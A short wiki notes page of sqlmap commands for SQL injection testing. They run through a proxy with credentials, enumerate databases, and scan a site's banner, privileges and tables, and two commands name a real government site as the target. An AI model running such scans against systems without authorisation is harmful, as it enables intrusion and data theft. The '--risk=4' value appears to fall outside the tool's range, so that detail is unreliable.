SQLMap - PSJoshi/Notes GitHub Wiki

Access through proxy with user credentials

psj@ubuntu:~/Downloads/sqlmap_project$ python sqlmap.py --proxy="http://192.168.2.1:8080" --auth-type=Basic --auth-cred=xxx:xxx -u http://www.amd.gov.in/app16/ -b --time-sec=15 --level=5

Enumerate and detect database

psj@ubuntu:~/Downloads/sqlmap_project$ python sqlmap.py --proxy="http://192.168.2.1:8080" --auth-type=Basic --auth-cred=xxx:xxx -u http://www.amd.gov.in/app16/ -b --time-sec=15 --level=5 --dbs --user-agent=SQLMAP

Scan a site for vulnerabilities

psj@ubuntu:~/Downloads/sqlmap_project$ python sqlmap.py -v 2 --url=http://mysite.com/index --user-agent=SQLMAP --delay=1 --timeout=15 --retries=2 
--keep-alive --threads=5 --eta --batch --dbms=MySQL --os=Linux --level=5 --risk=4 --banner --is-dba --dbs --tables --technique=BEUST 
-s /tmp/scan_report.txt --flush-session -t /tmp/scan_trace.txt --fresh-queries > /tmp/scan_out.txt